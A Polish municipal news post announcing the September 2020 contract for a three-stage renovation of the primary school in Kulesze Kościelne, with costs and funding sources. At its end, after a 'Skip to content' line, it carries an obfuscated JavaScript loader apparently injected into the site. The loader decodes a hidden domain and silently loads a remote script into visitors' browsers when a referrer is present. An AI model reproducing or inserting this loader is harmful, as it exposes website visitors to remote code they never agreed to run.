Aktualności

Podpisanie umowy na realizację robót budowlanych pn. „Remont i przebudowa budynków Szkoły Podstawowej im. Kardynała Stefana Wyszyńskiego w Kuleszach Kościelnych.

wrz 3, 2020 | Aktualności

W dniu 03 września 2020 r. w Urzędzie Gminy w Kuleszach Kościelnych podpisano umowę pomiędzy Gminą Kulesze Kościelne reprezentowaną przez Stefana Grodzkiego – Wójta Gminy, a firmą MIKABO Marcin Graniszewski na realizację robót budowlanych pn. „Remont i przebudowa budynków Szkoły Podstawowej im. Kardynała Stefana Wyszyńskiego w Kuleszach Kościelnych„. Wartość inwestycji to 2 550 306,00 zł.

Realizacja robót budowlanych odbywać się będzie w III etapach:

Etap I – Remont i przebudowa długiego holu, klas i łazienek (parter, I piętro) – od podpisania umowy do 30.11.2020 r.

Etap II – Remont i przebudowa głównego wejścia, szatni, klas, pomieszczeń technicznych oraz łazienek (parter, I piętro, II piętro) – 02.01.2021 r. – 31.08.2021 r.

Etap III – Remont i przebudowa stołówki, przedszkola, świetlicy oraz łazienek (parter, I piętro) – 15.06.2021 – 31.08.2021 r.

Wartość I etapu wynosi 693 133,00 zł z czego 452 684,69 zł są to środki z Funduszu Sołeckiego. We wrześniu 2019 r. Mieszkańcy wszystkich 32 sołectw z gminy Kulesze Kościelne zdecydowali o przekazaniu Funduszu Sołeckiego na remont Szkoły Podstawowej w Kuleszach Kościelnych. Pozostała kwota pochodzi z budżetu gminy.

Wartość II etapu  – 1 201 466,00 zł.

Wartość III etapu – 655 706,00 zł.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);